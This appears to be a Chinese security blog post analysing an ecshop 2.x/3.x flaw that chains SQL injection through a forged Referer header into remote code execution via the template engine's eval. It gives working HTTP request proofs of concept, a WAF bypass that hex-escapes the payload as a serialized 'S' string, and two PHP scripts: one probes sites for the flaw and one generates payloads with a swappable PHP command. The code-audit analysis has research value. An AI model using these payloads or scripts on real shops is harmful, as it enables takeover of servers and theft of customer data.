<!DOCTYPE html>
<html>
  <head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <meta name="description" content="whip1ash&#39;s blog">
  <meta name="keyword" content="hexo-theme, vuejs">
  <meta name="google-site-verification" content="Jn3GoSbAsK1naf6utvvBn1NniTRbPspDlWKN6rjfHNI" />
  <meta name="google-site-verification" content="U05PlKKB3jyiKQ6gkPfsh9R5SUeWyo4Lml44hId45VI" />
  
    <link rel="shortcut icon" href="/css/images/logo.png">
  
  <title>
    
      从SQLi到RCE -- ecshop 2.x/3.x无限制getshell | whip1ash
    
  </title>
  <link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
  <link href="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.css" rel="stylesheet">
  <link href="//cdn.bootcss.com/highlight.js/9.12.0/styles/tomorrow.min.css" rel="stylesheet">
  <link rel="stylesheet" href="/css/style.css">
<link rel="stylesheet" href="/css/plugins/gitment.css">
  <script src="//cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
  <script src="//cdn.bootcss.com/geopattern/1.2.3/js/geopattern.min.js"></script>
  <script src="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.js"></script>
  <script src="/js/qrious.js"></script>
<script src="/js/gitment.js"></script>
</head>
<div class="wechat-share">
  <img src="/css/images/logo.png" />
</div>

  <body>
    <header class="header fixed-header">
  <div class="header-container">
    <a class="home-link" href="/">
      <div class="logo"></div>
      <span>whip1ash</span>
    </a>
    <ul class="right-list">
      
        <li class="list-item">
          
            <a href="/" class="item-link">Home</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/tags/" class="item-link">Tags</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/archives/" class="item-link">Archives</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/project/" class="item-link">Projects</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/about/" class="item-link">About</a>
          
        </li>
      
    </ul>
    <div class="menu">
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
    </div>
    <div class="menu-mask">
      <ul class="menu-list">
        
          <li class="menu-item">
            
              <a href="/" class="menu-link">Home</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/tags/" class="menu-link">Tags</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/archives/" class="menu-link">Archives</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/project/" class="menu-link">Projects</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/about/" class="menu-link">About</a>
            
          </li>
        
      </ul>
    </div>
  </div>
</header>

    <div id="article-banner">
  <h2>从SQLi到RCE -- ecshop 2.x/3.x无限制getshell</h2>
  <p class="post-date">2018-09-05</p>
  <div class="arrow-down">
    <a href="javascript:;"></a>
  </div>
</div>
<main class="app-body flex-box">
  <!-- Article START -->
  <article class="post-article">
    <section class="markdown-content"><h1 id="如何从SQLi到RCE-–-ecshope-2-3-x-Getshell"><a href="#如何从SQLi到RCE-–-ecshope-2-3-x-Getshell" class="headerlink" title="如何从SQLi到RCE – ecshope 2/3.x Getshell"></a>如何从SQLi到RCE – ecshope 2/3.x Getshell</h1><p>分为两个个部分：</p>
<ol>
<li>ecshop 2.x getshell</li>
<li>Bypass ecshop 3.x WAF</li>
</ol>
<h2 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit"></a>Exploit</h2><h3 id="ecshop-2-x"><a href="#ecshop-2-x" class="headerlink" title="ecshop 2.x"></a>ecshop 2.x</h3><h4 id="SQLi-POC"><a href="#SQLi-POC" class="headerlink" title="SQLi POC"></a>SQLi POC</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">GET /user.php?act=login HTTP/1.1</span><br><span class="line">Host: test1.ecshop.com</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: en-US,en;q=0.5</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:&#123;s:3:&quot;num&quot;;s:68:&quot;0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)&quot;;s:2:&quot;id&quot;;i:1;&#125;</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 0</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br></pre></td></tr></table></figure>
<p><img src="/media/15362230081597.jpg" alt=""></p>
<h4 id="RCE-POC"><a href="#RCE-POC" class="headerlink" title="RCE POC"></a>RCE POC</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">GET /user.php?act=login HTTP/1.1</span><br><span class="line">Host: test1.ecshop.com</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: en-US,en;q=0.5</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:&#123;s:3:&quot;num&quot;;s:84:&quot;*/union select 1,0x272f2a,4,4,5,6,7,8,0x7b24275d3b706870696e666f2f2a2a2f28292f2f7d,0&quot;;s:2:&quot;id&quot;;s:3:&quot;&apos;/*&quot;;&#125;554fcae493e564ee0dc75bdf2ebf94ca</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br></pre></td></tr></table></figure>
<p><img src="/media/15363146794705.jpg" alt=""></p>
<h4 id="ecshop-3-x-bypass-waf-POC"><a href="#ecshop-3-x-bypass-waf-POC" class="headerlink" title="ecshop 3.x bypass waf POC"></a>ecshop 3.x bypass waf POC</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">POST /user.php?act=login HTTP/1.1</span><br><span class="line">Host: test.ecshop.com</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:52.0) Gecko/20100101 Firefox/52.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: close</span><br><span class="line">Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:&#123;s:3:&quot;num&quot;;S:96:&quot;*/\75\6e\69\6f\6e\20\73\65\6c\65\63\74\20\31\2c\30\78\32\37\32\66\32\61\2c\34\2c\34\2c\35\2c\36\2c\37\2c\38\2c\30\78\37\62\32\34\36\31\32\37\35\64\33\62\37\30\36\38\37\30\36\39\36\65\36\36\36\66\32\66\32\61\32\61\32\66\32\38\32\39\33\62\33\62\32\34\36\31\35\62\32\37\33\31\37\64\2c\30&quot;;s:2:&quot;id&quot;;s:3:&quot;&apos;/*&quot;;&#125;45ea207d7a2b68c49582d2d22adf953a</span><br><span class="line">Content-Length: 0</span><br></pre></td></tr></table></figure>
<p><img src="/media/15371878693825.jpg" alt=""></p>
<h2 id="Analyze"><a href="#Analyze" class="headerlink" title="Analyze"></a>Analyze</h2><h3 id="ecshop-2-x-1"><a href="#ecshop-2-x-1" class="headerlink" title="ecshop 2.x"></a>ecshop 2.x</h3><h4 id="SQLi"><a href="#SQLi" class="headerlink" title="SQLi"></a>SQLi</h4><p>在前台用户登录页面，<code>$back_act</code>变量从referer中获取，传递到<code>$smarty-&gt;assign()</code>函数中。<br>user.php<br><img src="/media/15362245237414.jpg" alt=""></p>
<p>跟进<code>$smarty-&gt;assign()</code>。<br>includes/cls_template.php<br><img src="/media/15362242468298.jpg" alt=""><br>当<code>$tpl_var</code>不是数组且不为空时，添加到当前对象的<code>_var</code>数组中。<br>将上述变量显示到页面上需要<code>$smarty-&gt;display()</code>函数。跟进一下。<br>includes/cls_template.php<br><img src="/media/15362274077547.jpg" alt=""><br>通过这里通过<code>$this-&gt;fetch()</code>-&gt;<code>$this-&gt;make_complied()</code>来获取最终呈现在页面上的结果，也就是<code>$out</code>变量的值，关于Smarty的知识简单的介绍一下。</p>
<p>这里使用了Smarty这个PHP模板框架，原理如图所示。<br><img src="/media/15362269107018.jpg" alt=""><br>登录页面的模板文件在<code>themes/default/user_passport.dwt</code>，编译后的php文件路径为<code>temp/compiled/user_passport.dwt.php</code>，其中使用了<code>$back_act</code>值的部分如图所示。<br><img src="/media/15362270721878.jpg" alt=""></p>
<p><img src="/media/15362270538028.jpg" alt=""><br>所以我们通过referer控制的值，经过编译以及PHP的运行，最后的呈现出来的结果如下图所示。<br><img src="/media/15362272995700.jpg" alt=""></p>
<p>回到<code>fetch()</code>函数，得到<code>$out</code>的值后判断其中是否存在<code>$this-&gt;_echash</code>，这是一个常量，在这里是<code>554fcae493e564ee0dc75bdf2ebf94ca</code>，然后进行分割，并进入<code>$this-&gt;insert_mod()</code>函数。<br><img src="/media/15362281757567.jpg" alt=""></p>
<p>重点来了，一眼看上去这个东西就有问题，一是存在反序列化，二是使用动态调用函数。全局搜索一下<code>function insert_</code>主要定位在lib_insert里。在这里就先用<code>insert_ads</code>这个函数。<br>includes/lib_insert.php<br><img src="/media/15362421492775.jpg" alt=""></p>
<p>这里可以比较明显的看出SQL语句存在拼接。这里只用了id和num两个参数，所以我们只需要序列化构造这两个参数就可以。这里用id这个参数，这里可以使用extractvalue就行，如果用produce analyse的话5.6.6以上的版本不支持。这里不再赘述了，POC如所示。<br><img src="/media/15362428099522.jpg" alt=""></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">poc</span><span class="params">()</span> </span>&#123;</span><br><span class="line">		$echash = <span class="string">'554fcae493e564ee0dc75bdf2ebf94ca'</span>;</span><br><span class="line">		$dyn_func = <span class="string">'ads'</span>;</span><br><span class="line">		$poc = <span class="keyword">array</span>(<span class="string">'num'</span>=&gt;<span class="string">'2'</span>,<span class="string">'id'</span>=&gt;<span class="string">'1\' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#'</span>);</span><br><span class="line">		$serialize = serialize($poc);</span><br><span class="line">		$referer = $echash.$dyn_func.<span class="string">"|"</span>.$serialize;</span><br><span class="line">		<span class="keyword">return</span> $referer;</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">curl</span><span class="params">($domain,$referer)</span></span>&#123;</span><br><span class="line">		$header = <span class="keyword">array</span>(<span class="string">"Referer: $referer"</span>);</span><br><span class="line">		</span><br><span class="line">		$ch = curl_init();</span><br><span class="line">		curl_setopt($ch,CURLOPT_URL,$domain.<span class="string">"/user.php?act=login"</span>);</span><br><span class="line">		curl_setopt($ch,CURLOPT_RETURNTRANSFER,<span class="number">1</span>);</span><br><span class="line">		curl_setopt($ch,CURLOPT_HTTPHEADER,$header);</span><br><span class="line">		</span><br><span class="line">		curl_setopt($ch, CURLOPT_PROXY, <span class="string">"http://127.0.0.1"</span>);</span><br><span class="line">		curl_setopt($ch, CURLOPT_PROXYPORT, <span class="number">8080</span>);</span><br><span class="line">		</span><br><span class="line">		$output = curl_exec($ch);</span><br><span class="line">		curl_close($ch);</span><br><span class="line">		<span class="keyword">if</span>($output === <span class="keyword">FALSE</span> )&#123;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"CURL Error:"</span>.curl_error($ch);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span>(strpos($output, <span class="string">"XPATH syntax error"</span>) !== <span class="keyword">false</span>)&#123;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"This domain can be pwn!"</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span>&#123;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"This server is safe!"</span>;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	$domain = <span class="string">"http://test1.ecshop.com"</span>;</span><br><span class="line">	$referer = poc();</span><br><span class="line">	</span><br><span class="line">	curl($domain,$referer);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h4 id="RCE"><a href="#RCE" class="headerlink" title="RCE"></a>RCE</h4><p>继续看<code>insert_ads</code>这个函数的后半段。<br><img src="/media/15362429122007.jpg" alt=""><br><code>$position_style</code>是可控的，是从数据库中取出来的<br>209行的这个<code>$position_style</code>变量加上了<code>str:</code>并传入了<code>fetch()</code>函数，看一眼<code>fetch()</code>函数。<br><img src="/media/15362431327406.jpg" alt=""><br>可以发现，对于开头是<code>str:</code>的文件名带进了<code>_eval()</code>这个看起来就很敏感的函数。所以回<code>insert_ads</code>函数看看如何控制<code>$position_style</code>的值。<br>includes/lib_insert.php<br><img src="/media/15362432910293.jpg" alt=""><br>从数据库查询出来的表中，<code>position_id</code>字段的值要与反序列化出来的数组<code>$arr</code>的<code>id</code>字段相等，才会进行赋值。那么上面通过控制<code>$arr[&#39;id&#39;]</code>来进行注入的方式就不是那么好用了，主要还得通过<code>$arr[&#39;num&#39;]</code>来传递payload。<br><code>media_type</code>字段这里给4，为了不执行switch逻辑，以免节外生枝。<br>所以构造如下payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">554fcae493e564ee0dc75bdf2ebf94caads|a:2:&#123;s:3:&quot;num&quot;;s:86:&quot;*/union select 1,0x272f2a,4,4,5,6,7,8,0x74657374706f63706f63706f63706f63706f63706f63,0&quot;;s:2:&quot;id&quot;;s:3:&quot;&apos;/*&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>把order by limit给注释掉就可以无限制进行注入了。<br>回到includes/cls_template.php的<code>fetch()</code>函数。跟进一下<code>_eval()</code>的前一步处理<code>fetch_str()</code>。<br><img src="/media/15362474632329.jpg" alt=""></p>
<p>还是一个比较复杂的正则，但是问题不大，可以使用<code>https://regex101.com/</code>来看看这个函数匹配了哪些东西。<br>先看第一个正则，这个正则主要是过滤一些关键字，分为三个部分，第一个部分匹配除了<code>a-z0-9A-Z_</code>以外的所有字符，第二部分值一些敏感函数的关键字，最后匹配空格和前半括号一次。<br><img src="/media/15362816925285.jpg" alt=""><br>第二个正则不用管，只要不进入if这段逻辑就可以了，最后return的正则也比较简单，就是将匹配到(花括号中的内容)的值传递给<code>$this-&gt;select()</code>，这里phpStorm跟不进去，可以将cls_template.php复制出来，然后在外面调用。<br>我们先给一个简单的poc:<code>{phpinfo()}</code>，因为phpinfo在第一个正则会被过滤，所以注释一下，绕过第一个正则。<code>{phpinfo/**/()}</code></p>
<p>includes/cls_template.php<br><img src="/media/15362859279328.jpg" alt=""><br>可以看到在<code>tag</code>变量第一个字符为$的时候进入 <code>get_val()</code> ，跟一下<code>get_val()</code>。<br>这里有一个巨坑的地方，不知道是不是我字体的原因，我这里的phpstorm居然在单双引号中不显示<code>.</code>这个字符。坑爆了，刚开始以为是匹配<code>$</code>，后来发现是匹配<code>.$</code>，升级到最新版本可以解决这个问题。<br>我们给poc加上$，带进去试试。<br><img src="/media/15362889193527.jpg" alt=""><br>跳入<code>get_value</code>中的图中标出的逻辑。跟进<code>make_var</code>函数。<br><img src="/media/15362891027956.jpg" alt=""><br>可以看到在这个函数中给poc拼接了一些字符串。<br><img src="/media/15362893318990.jpg" alt=""></p>
<p>所以最终的处理是这样的。<br><img src="/media/15362895041088.jpg" alt=""><br>闭合一下。<br><img src="/media/15362900203459.jpg" alt=""><br>所以最后带进eval的值如图所示。<br><img src="/media/15362902849758.jpg" alt=""><br>构造最终的poc应该为<code>{$&#39;];phpinfo/**/()//}</code>。序列化一下。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">554fcae493e564ee0dc75bdf2ebf94caads|a:2:&#123;s:3:&quot;num&quot;;s:84:&quot;*/union select 1,0x272f2a,4,4,5,6,7,8,0x7b24275d3b706870696e666f2f2a2a2f28292f2f7d,0&quot;;s:2:&quot;id&quot;;s:3:&quot;&apos;/*&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>这个POC执行一下发现，报错了。<br><img src="/media/15363133863672.jpg" alt=""><br>调了一下发现是在反序列化的时候有一个参数的空的。<br>看了一下中间生成的模板，发现其他在分割的时候都如下图所示。<br><img src="/media/15363144117859.jpg" alt=""><br>这个主要是<code>display()</code>函数中的这一段。<br><img src="/media/15363145449169.jpg" alt=""><br>所以最后的POC如下所示。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">554fcae493e564ee0dc75bdf2ebf94caads|a:2:&#123;s:3:&quot;num&quot;;s:84:&quot;*/union select 1,0x272f2a,4,4,5,6,7,8,0x7b24275d3b706870696e666f2f2a2a2f28292f2f7d,0&quot;;s:2:&quot;id&quot;;s:3:&quot;&apos;/*&quot;;&#125;554fcae493e564ee0dc75bdf2ebf94ca</span><br></pre></td></tr></table></figure>
<p><img src="/media/15363146384976.jpg" alt=""></p>
<h3 id="echsop-3-x-bypass-WAF"><a href="#echsop-3-x-bypass-WAF" class="headerlink" title="echsop 3.x bypass WAF"></a>echsop 3.x bypass WAF</h3><p>用上一次构造的POC打一下，发现被拦了。<br><img src="/media/15371890931440.jpg" alt=""><br>搜一下这个字符串。<br>includes/safety.php<br><img src="/media/15371893629675.jpg" alt=""></p>
<p>发现3.x带有一个WAF，简单的看了一下，主要是通过正则匹配关键字进行过滤的。<br><img src="/media/15371894283526.jpg" alt=""></p>
<p>所以POC中不能出现被拦截的关键字，比如 select，union等。<br>对比了一下2.x和3.x存在漏洞的地方，发现其他位置并没有进行改动。<br>这里有一个trick可以bypass这个waf - 使用反序列化的escaped binary string类型。<br><img src="/media/15371897755193.jpg" alt=""><br>php的反序列化对于转义字符存在一个特性，在序列化和反序列化的时候可以对转义字符进行处理。<br>众所周知，PHP可以对双引号内的数据进行转义。如图，<br><img src="/media/15371901537155.jpg" alt=""><br>所以当然在序列化的时候也可以用。<br><img src="/media/15371899876940.jpg" alt=""><br>在反序列化的时候设置数据类型为S时，也可是使用这个特性。（目前没有找到办法可以序列化成S类型，只能通过手动设置）<br><img src="/media/15371913733092.jpg" alt=""><br>这里注意一下，S类型的数据长度是转义后的长度，而不是输入数据的长度。</p>
<p>所以刚才的POC注入的SQL语句转成S类型就好了。</p>
<p>下面是POC。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function strToHex($string)&#123;</span><br><span class="line">	$hex=&quot;&quot;;</span><br><span class="line">	for($i=0;$i&lt;strlen($string);$i++)</span><br><span class="line">	$hex.=dechex(ord($string[$i]));</span><br><span class="line">	$hex=strtolower($hex);</span><br><span class="line">	return $hex;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//构造poc</span><br><span class="line">function base_poc($payload)&#123;</span><br><span class="line">	$base_poc = &quot;&#123;\$a&apos;];$payload//&#125;&quot;;</span><br><span class="line">	$base_poc = strToHex($base_poc);</span><br><span class="line">	return $base_poc;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//生成referer</span><br><span class="line">function referer($base_poc)&#123;</span><br><span class="line">	$echash = &apos;45ea207d7a2b68c49582d2d22adf953a&apos;;</span><br><span class="line">	$dyn_func = &apos;ads&apos;;</span><br><span class="line">	$poc0 = array(&apos;num&apos;=&gt;&quot;*/union select 1,0x272f2a,4,4,5,6,7,8,0x$base_poc,0&quot;,&apos;id&apos;=&gt;&apos;\&apos;/*&apos;);</span><br><span class="line">	$serialize = serialize($poc0);</span><br><span class="line">	$referer = $echash.$dyn_func.&quot;|&quot;.$serialize.$echash;</span><br><span class="line">	return $referer;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function construt_str($str)&#123;</span><br><span class="line">	$res = array(&quot;origin&quot;=&gt;&apos;&apos;,&quot;modified&quot;=&gt;&apos;&apos;);</span><br><span class="line">	//截取字段num中的值</span><br><span class="line">	$poc_pos0 = strpos($str, &quot;union&quot;);</span><br><span class="line">	$poc_pos1 = strrpos($str, &quot;,&quot;)+2;</span><br><span class="line">	$poc_len = $poc_pos1 - $poc_pos0;</span><br><span class="line">	$tmp_poc = substr($str, $poc_pos0,$poc_len);</span><br><span class="line">	//后面替换时使用</span><br><span class="line">	$res[&apos;origin&apos;] = $tmp_poc;</span><br><span class="line">	$res[&apos;modified&apos;] = modify_str($tmp_poc);</span><br><span class="line">	</span><br><span class="line">	return $res;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//处理字符串格式</span><br><span class="line">function modify_str($str)&#123;</span><br><span class="line">	$str = strToHex($str);</span><br><span class="line">	</span><br><span class="line">	$insert = &apos;\\&apos;;</span><br><span class="line">	$str_len = strlen($str);</span><br><span class="line">	if($str_len % 2 !== 0)&#123;</span><br><span class="line">		echo &quot;The length of input string is wrong!&quot;;</span><br><span class="line">		return 0;</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	for($i = 0; $i&lt;($str_len*3/2); $i=$i+3)&#123;</span><br><span class="line">		$str = substr_replace($str, $insert, $i ,0);</span><br><span class="line">	&#125;</span><br><span class="line">	return $str;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function replace($origin,$modified,$referer)&#123;</span><br><span class="line">	$res_poc = str_replace($origin, $modified, $referer);</span><br><span class="line">	</span><br><span class="line">	//使用 escaped binary string 模式</span><br><span class="line">	$pos = strpos($res_poc, &apos;m&quot;;&apos;) + 3;</span><br><span class="line">	$res_poc[$pos] = &apos;S&apos;;</span><br><span class="line">	return $res_poc;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function poc($payload)&#123;</span><br><span class="line">	$base_poc = base_poc($payload);</span><br><span class="line">	$referer = referer($base_poc);</span><br><span class="line">	$tmp_res = construt_str($referer);</span><br><span class="line">	$res = replace($tmp_res[&apos;origin&apos;], $tmp_res[&apos;modified&apos;], $referer);</span><br><span class="line">	</span><br><span class="line">	return $res;</span><br><span class="line">	</span><br><span class="line">&#125;</span><br><span class="line">	$payload = &quot;phpinfo/**/();&quot;;</span><br><span class="line">	echo poc($payload).&quot;\n&quot;;</span><br><span class="line"></span><br><span class="line">		</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<h2 id="说点废话"><a href="#说点废话" class="headerlink" title="说点废话"></a>说点废话</h2><p>这个漏洞的信息量比较大，还是比较值得学习的。中间电脑拿去修了，所以上下篇隔得时间稍微有点久，望谅解。</p>
</section>
    <!-- Tags START -->
    
      <div class="tags">
        <span>Tags:</span>
        
  <a href="/tags#php" >
    <span class="tag-code">php</span>
  </a>

  <a href="/tags#代码审计" >
    <span class="tag-code">代码审计</span>
  </a>

  <a href="/tags#sql injection" >
    <span class="tag-code">sql injection</span>
  </a>

  <a href="/tags#CMS" >
    <span class="tag-code">CMS</span>
  </a>

      </div>
    
    <!-- Tags END -->
    <!-- 打赏 START -->
    
    <!-- 打赏 END -->
    <!-- 二维码 START -->
    <div class="qrcode">
      <canvas id="share-qrcode"></canvas>
      <p class="notice">扫描二维码，分享此文章</p>
    </div>
    <!-- 二维码 END -->
    
      <!-- Gitment START -->
      <div id="comments"></div>
      <!-- Gitment END -->
    
  </article>
  <!-- Article END -->
  <!-- Catalog START -->
  
    <aside class="catalog-container">
  <div class="toc-main">
    <strong class="toc-title">Catalog</strong>
    
      <ol class="toc-nav"><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#如何从SQLi到RCE-–-ecshope-2-3-x-Getshell"><span class="toc-nav-text">如何从SQLi到RCE – ecshope 2/3.x Getshell</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#Exploit"><span class="toc-nav-text">Exploit</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#ecshop-2-x"><span class="toc-nav-text">ecshop 2.x</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#SQLi-POC"><span class="toc-nav-text">SQLi POC</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#RCE-POC"><span class="toc-nav-text">RCE POC</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#ecshop-3-x-bypass-waf-POC"><span class="toc-nav-text">ecshop 3.x bypass waf POC</span></a></li></ol></li></ol></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#Analyze"><span class="toc-nav-text">Analyze</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#ecshop-2-x-1"><span class="toc-nav-text">ecshop 2.x</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#SQLi"><span class="toc-nav-text">SQLi</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#RCE"><span class="toc-nav-text">RCE</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#echsop-3-x-bypass-WAF"><span class="toc-nav-text">echsop 3.x bypass WAF</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#说点废话"><span class="toc-nav-text">说点废话</span></a></li></ol></li></ol>
    
  </div>
</aside>
  
  <!-- Catalog END -->
</main>

<script>
  (function () {
    var url = 'https://whip1ash.github.io/2018/09/05/ecshop-getshell/';
    var banner = 'undefined'
    if (banner !== '' && banner !== 'undefined' && banner !== 'null') {
      $('#article-banner').css({
        'background-image': 'url(' + banner + ')'
      })
    } else {
      $('#article-banner').geopattern(url)
    }
    $('.header').removeClass('fixed-header')

     // error image
    $(".markdown-content img").on('error', function() {
      $(this).attr('src', 'http://file.muyutech.com/error-img.png')
      $(this).css({
        'cursor': 'default'
      })
    })

    // zoom image
    $(".markdown-content img").on('click', function() {
      var src = $(this).attr('src')
